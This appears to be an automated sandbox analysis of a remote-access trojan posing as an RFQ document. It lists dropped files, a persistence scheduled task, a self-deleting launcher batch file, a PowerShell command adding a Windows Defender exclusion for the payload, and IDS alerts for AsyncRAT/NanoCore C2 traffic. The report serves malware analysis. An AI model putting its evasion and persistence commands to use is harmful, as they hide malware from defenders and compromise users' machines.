                                                                    Size (bytes):21704
                                                                    Entropy (8bit):5.597528400509029
                                                                    Encrypted:false
                                                                    SSDEEP:384:/tL67waWub8VWzZPWCDzj8eNSBKnsjultIW8aepEQt11u16z+5mHKHVg3P8j6Ivv:4CubLz5FfN4KsClt8a+f13+U+WEmlc
                                                                    MD5:2F13EF84B063265B6634CB005F4B5286
                                                                    SHA1:0AA0F7DC07BD5D1A12DAE304E40B70755A3F164A
                                                                    SHA-256:638143E39E07AD1C5DAF1BE1FB96B03C42B543B790849C7716AC2AC6718F667E
                                                                    SHA-512:9CBD81D15290642E4853B32BAAC634395AAC24B40279E8D24C33715EDA4161FE45580BA39C97CC8295B2CE312E97251795542323795ED32F74F9774B7E0CC4AD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: @...e.....................u.P.E.B... .l..............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)f.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x3ucvgo.4eb.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cfrruvyb.luy.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svjneimu.gkz.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqgzyu5l.f34.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):567808
                                                                    Entropy (8bit):7.627302244469304
                                                                    Encrypted:false
                                                                    SSDEEP:12288:3v5+Ky22SH/s6TYnPEvvslosxkhoNB3Ps7hZJ:/029/enPEHkowNB/S
                                                                    MD5:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    SHA1:A43016FA816AFD1693FB7F266DD032FD7F061C35
                                                                    SHA-256:B586CA95BA9557F7AD2434D01F96FF191B77541670894DF3B78AA3A8312AE092
                                                                    SHA-512:0B87028C9E9654BC3FC69797E9B241604C1A6266DF388E8E01CCE98F19507F5544B35AFD02462E2229D4F4C9B8D348AB9A0294B1802F98D6F80F608657BC7675
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.a................................. ........@.. ....................... ............@....................................K.......T............................................................................ ............... ..H............text...4.... ...................... ..`.sdata..............................@....rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1600
                                                                    Entropy (8bit):5.151412589996552
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtXxvn:cge4MYrFdOFzOzN33ODOiDdKrsuThv
                                                                    MD5:C286A082609C1C1A219FF01B51775164
                                                                    SHA1:F8A15ACBF3A55AD917F35566777A6EC4731DE800
                                                                    SHA-256:8ED2C4AF8E80335DE493A0A74226839E5505BA01BFD742C9A56A296878D9D636
                                                                    SHA-512:2FD055314D57E399D6CBB5FAFC7B98AD0910AD3D82F01A531C08EE36E8384FF1B86A6656741AE4C0E59E818EFFB92398BDF54ED7DADB7D0AA911982AA211A9E5
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                    C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):154
                                                                    Entropy (8bit):5.030771528412489
                                                                    Encrypted:false
                                                                    SSDEEP:3:mKDDCMNqTtvL5oWXp5cViE2J5xAIjkOAdLvmqRDWXp5cViE2J5xAInTRINjio5Z6:hWKqTtT6WXp+N23fjdCvmq1WXp+N23fb
                                                                    MD5:07BDDF3468F5B8BEAFB3C3BFAA8E4C3D
                                                                    SHA1:92D16205F5D6F7B4CDFAD83119A5E47A8F430DB8
                                                                    SHA-256:7704F72B9FD7E75BDD3D3C8632B4F332120E94C1B8CAD84B6F62C2B63CEADD2C
                                                                    SHA-512:C10E87D75A658380DD96B9B7A94201C342BADEB4AE400B88CD21D72CBF76865307A1A5A645D6B36A9E4ECDB7FFADBAC212E97B4F0E5DE25C98B14B84AE0685C6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: @echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Local\Temp\mozille.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpB8D1.tmp.bat" /f /q..
                                                                    C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
                                                                    Process:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1600
                                                                    Entropy (8bit):5.151412589996552
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtXxvn:cge4MYrFdOFzOzN33ODOiDdKrsuThv
                                                                    MD5:C286A082609C1C1A219FF01B51775164
                                                                    SHA1:F8A15ACBF3A55AD917F35566777A6EC4731DE800
                                                                    SHA-256:8ED2C4AF8E80335DE493A0A74226839E5505BA01BFD742C9A56A296878D9D636
                                                                    SHA-512:2FD055314D57E399D6CBB5FAFC7B98AD0910AD3D82F01A531C08EE36E8384FF1B86A6656741AE4C0E59E818EFFB92398BDF54ED7DADB7D0AA911982AA211A9E5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                    C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):567808
                                                                    Entropy (8bit):7.627302244469304
                                                                    Encrypted:false
                                                                    SSDEEP:12288:3v5+Ky22SH/s6TYnPEvvslosxkhoNB3Ps7hZJ:/029/enPEHkowNB/S
                                                                    MD5:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    SHA1:A43016FA816AFD1693FB7F266DD032FD7F061C35
                                                                    SHA-256:B586CA95BA9557F7AD2434D01F96FF191B77541670894DF3B78AA3A8312AE092
                                                                    SHA-512:0B87028C9E9654BC3FC69797E9B241604C1A6266DF388E8E01CCE98F19507F5544B35AFD02462E2229D4F4C9B8D348AB9A0294B1802F98D6F80F608657BC7675
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.a................................. ........@.. ....................... ............@....................................K.......T............................................................................ ............... ..H............text...4.... ...................... ..`.sdata..............................@....rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe:Zone.Identifier
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                    C:\Users\user\Documents\20220112\PowerShell_transcript.138727.F_iUYR88.20220112090240.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5801
                                                                    Entropy (8bit):5.4133657955498915
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZZhENMqDo1Z4ZUhENMqDo1ZsOI2jZohENMqDo1ZermmOZ1:c
                                                                    MD5:A60FA78FF988D57F3451E409235D01C5
                                                                    SHA1:ACE6418390C2687EC72117DD8A11F25FC9D830B2
                                                                    SHA-256:DC0A2EB75B913C1FD7C28E211C0045E678AC5D659706AFBF63967569CA69ED15
                                                                    SHA-512:7AACF764D22856EC2EB7773B26E7559A4DC20278BDE3BD689EE288956AA9A06A95886EE10DCF447C7CDB94396FE4C560C97E847BEE16D3B45C214236BE466CC7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20220112090242..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe..Process ID: 5400..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220112090242..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe..**********************..Windows PowerShell transcript start..Start time: 20220112090441..Username: computer\user..RunAs User: DESKTOP-716T77
                                                                    C:\Users\user\Documents\20220112\PowerShell_transcript.138727.fhx+G1tL.20220112090212.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5801
                                                                    Entropy (8bit):5.41379343008454
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZvhENVqDo1ZuZshENVqDo1ZEOI2jZPhENVqDo1ZnrmmOZ1:T
                                                                    MD5:5DB6DDA4F50FC48388AEB9886E8D92FA
                                                                    SHA1:1B375170354A7D83E1E9478A93C8A17ED180E735
                                                                    SHA-256:F26C8CA471D97986F5C2DC5DA82BBCA9DA4C4EAEBC5EFB88917BD5D88403A7ED
                                                                    SHA-512:0ABC022E484CC6A00878DDD0B92A7D445C930C5DE61085961CB9A30DDB1E4FDE2484294EF36252566E52AD2C5389185724F8EBEA476364255DB84D2BBBEDEE4B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20220112090213..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe..Process ID: 6080..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220112090213..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe..**********************..Windows PowerShell transcript start..Start time: 20220112090526..Username: computer\user..RunAs User: DESKTOP-716T77
                                                                    \Device\Null
                                                                    Process:C:\Windows\SysWOW64\timeout.exe
                                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.41440934524794
                                                                    Encrypted:false
                                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.627302244469304
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                    File name:RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File size:567808
                                                                    MD5:9fd45110bad75cda6de67232014aeb6e
                                                                    SHA1:a43016fa816afd1693fb7f266dd032fd7f061c35
                                                                    SHA256:b586ca95ba9557f7ad2434d01f96ff191b77541670894df3b78aa3a8312ae092
                                                                    SHA512:0b87028c9e9654bc3fc69797e9b241604c1a6266df388e8e01cce98f19507f5544b35afd02462e2229d4f4c9b8d348ab9a0294b1802f98d6f80f608657bc7675
                                                                    SSDEEP:12288:3v5+Ky22SH/s6TYnPEvvslosxkhoNB3Ps7hZJ:/029/enPEHkowNB/S
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.a................................. ........@.. ....................... ............@................................

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x48b82e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x61DE32FE [Wed Jan 12 01:46:38 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8b7e00x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x554.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x900000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8b7880x1c.text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x898340x89a00False0.843022678247data7.64899477975IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .sdata0x8c0000x2040x400False0.458984375data4.099059951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x8e0000x5540x600False0.340494791667data2.80510503091IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x900000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x8e0e80xb0GLS_BINARY_LSB_FIRST
                                                                    RT_GROUP_ICON0x8e1980x14data
                                                                    RT_VERSION0x8e1ac0x3a8data

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright micolous 2006-2007
                                                                    Assembly Version0.1.6.0
                                                                    InternalNameIDescriptionMetadataEnt.exe
                                                                    FileVersion0.1.6.0
                                                                    CompanyNamemicolous
                                                                    LegalTrademarks
                                                                    Comments
                                                                    ProductNameIGA Ad Cache Editor
                                                                    ProductVersion0.1.6.0
                                                                    FileDescriptionIGA Ad Cache Editor
                                                                    OriginalFilenameIDescriptionMetadataEnt.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    01/12/22-09:02:52.180734TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)55124972089.238.150.43192.168.2.3
                                                                    01/12/22-09:04:02.052703TCP2025019ET TROJAN Possible NanoCore C2 60B497295512192.168.2.389.238.150.43
                                                                    01/12/22-09:04:10.617296TCP2025019ET TROJAN Possible NanoCore C2 60B497305512192.168.2.389.238.150.43

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 12, 2022 09:02:51.992925882 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:52.038013935 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:02:52.038110018 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:52.121738911 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:52.180733919 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:02:52.180757046 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:02:52.180808067 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:52.190129042 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:52.236762047 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:02:52.279273033 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:57.763133049 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:57.853986979 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:02:57.854074001 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:57.932223082 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:02:59.755090952 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:02:59.795608997 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:02:59.841047049 CET55124972089.238.150.43192.168.2.3
                                                                    Jan 12, 2022 09:02:59.889302969 CET497205512192.168.2.389.238.150.43
                                                                    Jan 12, 2022 09:03:00.021341085 CET497205512192.168.2.389.238.150.43
